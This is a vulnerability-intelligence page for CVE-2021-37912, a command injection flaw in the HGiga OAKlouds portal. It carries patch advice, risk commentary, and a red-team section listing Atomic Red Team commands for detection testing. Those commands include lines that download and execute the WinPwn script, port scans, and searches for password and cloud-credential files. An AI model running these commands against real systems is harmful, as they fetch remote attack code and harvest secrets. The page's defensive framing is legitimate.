CVE-2021-37912
Overview
This vulnerability is a command injection flaw rooted in insufficient input validation of the Ethernet number parameter within the network interface card setting page of the HGiga OAKlouds OAKSv2 mobile portal. The affected component fails to sanitize or filter special characters, allowing crafted input to be interpreted as system commands. This lack of proper input filtering enables injection of arbitrary commands at the system level.
Vulnerability Description
The HGiga OAKlouds mobile portal does not filter special characters of the Ethernet number parameter of the network interface card setting page. Remote attackers can use this vulnerability to perform command injection and execute arbitrary commands in the system without logging in.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary commands on the affected system, potentially gaining full control over the device. Given the network accessibility of the mobile portal and the lack of authentication (AV:N/AC:L/PR:N/UI:N), exploitation can lead to unauthorized system compromise, data manipulation, or service disruption. This can result in significant operational impact, including unauthorized access to sensitive information and disruption of network services.
Solution
According to the advisory published by TW-CERT (https://www.twcert.org.tw/tw/cp-132-5091-7e0c5-1.html), users of HGiga OAKlouds OAKSv2 should apply the vendor-released patches addressing input validation on the network interface card setting page. The vendor recommends updating to the fixed version of the OAKlouds portal as specified in the advisory. Administrators should follow the detailed patch installation instructions provided in the referenced advisory to mitigate the vulnerability effectively.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the HGiga OAKlouds mobile portal arises from inadequate input validation, specifically concerning the Ethernet number parameter on the network interface card settings page. This oversight allows for the injection of special characters, which can lead to command injection vulnerabilities. When an attacker manipulates this parameter, they can craft malicious input that the system interprets as legitimate commands. The lack of proper filtering means that these commands can be executed with the same privileges as the application itself, potentially granting the attacker full control over the affected system without requiring authentication.
Exploitation of this vulnerability can occur through various attack vectors. A remote attacker could leverage the mobile portal's web interface, sending specially crafted requests that exploit the flawed handling of the Ethernet number parameter. This could be done via automated scripts or manual testing, making it accessible even to those with limited technical skills. Once the attacker successfully injects commands, they could execute arbitrary actions, such as altering system configurations, accessing sensitive data, or deploying malware. The ability to execute commands remotely without authentication significantly amplifies the threat level, as it allows for a wide range of malicious activities that could compromise the integrity and confidentiality of the system.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on the HGiga OAKlouds mobile portal for network management. Successful exploitation could lead to unauthorized access to critical systems, data breaches, and operational disruptions. The potential for data exfiltration or system compromise poses significant business risks, including financial losses, reputational damage, and legal ramifications. Organizations may face regulatory scrutiny if sensitive data is exposed, and the costs associated with incident response and recovery can be considerable. Furthermore, the high CVSS score of 9.8 indicates that this vulnerability is critical, necessitating immediate attention from security teams.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including penetration testing and code reviews, can help identify and remediate input validation flaws before they can be exploited. Employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests that attempt to exploit command injection vulnerabilities. Additionally, organizations should ensure that they are running the latest version of the HGiga OAKlouds portal, as updates may include patches that address this specific vulnerability. Educating staff about secure coding practices and the importance of input validation can also help prevent similar vulnerabilities in the future.
In conclusion, the command injection vulnerability present in the HGiga OAKlouds mobile portal represents a significant threat to organizations utilizing this platform. The ease of exploitation combined with the potential for severe consequences underscores the need for proactive security measures. By prioritizing detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability, ensuring the integrity and security of their network management systems.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-37912, rising by approximately 24% to 0.0824. While this numerical change does not correspond with a surge in active exploitation or new proof-of-concept releases, it signals a growing likelihood that threat actors are increasingly considering this vulnerability as a viable attack vector. Our telemetry indicates that the risk perception within the attacker community is stabilizing at a higher level, which may precede more frequent or targeted exploitation attempts. This upward adjustment in EPSS underscores the need for heightened vigilance among defenders, as the vulnerability’s critical severity combined with its ease of exploitation continues to present a substantial threat. Although no new exploit techniques have been detected, the elevated EPSS score suggests that CVE-2021-37912 remains a relevant and potentially escalating risk in the current threat landscape.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Hgiga | Oaklouds Portal | All |
cpe:2.3:a:hgiga:oaklouds_portal:*:*:*:*:*:*:*:*
|
|
|
Hgiga | Oaklouds Portal | All |
cpe:2.3:a:hgiga:oaklouds_portal:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-37912 |
| twcert.org.tw |
GitHub CVE
x_refsource_MISC
|
https://www.twcert.org.tw/tw/cp-132-5091-7e0c5-1.html |